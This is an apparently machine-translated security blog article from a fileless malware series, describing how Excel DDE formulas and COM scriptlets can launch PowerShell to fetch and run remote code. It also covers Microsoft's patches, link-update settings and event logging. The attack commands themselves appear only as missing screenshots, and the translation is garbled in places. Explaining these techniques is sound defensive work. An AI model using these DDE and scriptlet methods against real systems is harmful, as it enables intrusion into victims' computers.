This article is part of the Fileless Malware series. All other parts of the series:
- (we are here)
In this series of articles, we explore attack methods that require minimal effort on the part of hackers. In the past We've covered that it's possible to paste the code itself into the DDE autofield payload in Microsoft Word. By opening such a document attached to a phishing email, an unwary user will allow the attacker to gain a foothold on his computer. However, at the end of 2017, Microsoft this loophole for attacks on DDE.
The fix adds a registry entry that disables DDE functions in Word. If you still need this functionality, then you can return this option by enabling the old DDE capabilities.
However, the original patch only covered Microsoft Word. Do these DDE vulnerabilities exist in other Microsoft Office products that could also be exploited in no-code attacks? Yes, sure. For example, you can also find them in Excel.
Night of the Living DDE
I remember that last time I stopped at the description of COM scriptlets. I promise that I will get to them later in this article.
In the meantime, let's look at another evil side of DDE in the Excel version. Just like in Word, some hidden features of DDE in Excel allow you to execute code effortlessly. As a user who grew up with Word, I was familiar with fields but didn't know much about functions in DDE.
I was amazed to learn that in Excel I can call a shell from a cell as shown below:
Did you know that this was possible? Personally, I donβt
This ability to launch a Windows shell is courtesy of DDE. You can think of many other things
Applications that you can connect to using Excel's built-in DDE functions.
Are you thinking the same thing as me?
Let our in-cell command start a PowerShell session that then downloads and executes the link - this which we have already used before. See below:
Just paste a little PowerShell to load and run remote code in Excel
But there is a catch: you must explicitly enter this data into the cell for this formula to work in Excel. How can a hacker execute this DDE command remotely? The fact is that when an Excel table is open, Excel will try to update all the links in DDE. Trust Center settings have long had the ability to disable this or warn when updating links to external data sources.
Even without the latest patches, you can disable automatic link updating in DDE
Microsoft originally himself Companies in 2017 should disable automatic link updates to prevent DDE vulnerabilities in Word and Excel. In January 2018, Microsoft released patches for Excel 2007, 2010 and 2013 that disable DDE by default. This Computerworld describes all the details of the patch.
Well, what about the event logs?
Microsoft still abandoned DDE for MS Word and Excel, thus finally recognizing that DDE is more like a bug than a feature. If for some reason you have not yet installed these patches, you can still reduce the risk of a DDE attack by disabling automatic link updates and enabling options that prompt users to update links when opening documents and spreadsheets.
Now the million dollar question: If you are a victim of this attack, will PowerShell sessions launched from Word fields or Excel cells show up in the log?
Question: Are PowerShell sessions launched via DDE logged? Answer: yes
When you run PowerShell sessions directly from an Excel cell rather than as a macro, Windows will log these events (see above). At the same time, I canβt claim that it will be easy for the security team to then connect all the dots between the PowerShell session, the Excel document and the email message and understand where the attack began. I'll come back to this in the last article in my never-ending series on the elusive malware.
How is our COM?
In the previous I touched on the topic of COM scriptlets. They are convenient in themselves. , which allows you to pass code, say JScript, simply as a COM object. But then the scriptlets were discovered by hackers, and this allowed them to gain a foothold on the victim's computer without using extra tools. This from the Derbycon conference shows built-in Windows tools like regsrv32 and rundll32 that take remote scriptlets as arguments and hackers essentially carry out their attack without the help of malware. As I showed you last time, you can easily run PowerShell commands with a JScript scriptlet.
It turned out that one is very smart found a way to run a COM scriptlet Π² Excel document. He discovered that when he tried to insert a link to a document or picture into a cell, a certain package was inserted into it. And this package quietly accepts a remote scriptlet as input (see below).
Boom! Another stealthy, silent method to launch a shell using COM scriptlets
After a low-level inspection of the code, the researcher found out that this is actually a bug in the package software. It was not intended to run COM scriptlets, but only to reference files. I'm not sure if there is already a patch for this vulnerability. In my own research on an Amazon WorkSpace virtual desktop with Office 2010 preinstalled, I was able to reproduce the results. However, when I tried again later, it didn't work.
I really hope that I told you a lot of interesting things and at the same time showed that hackers can penetrate your company in one way or another in a similar way. Even if you install all the latest Microsoft patches, hackers still have a lot of tools to gain a foothold in the system, from the VBA macros I started this series with, to the malicious payload in Word or Excel.
In the final (I promise) article in this saga, I'll talk about how to provide smart protection.
Source: habr.com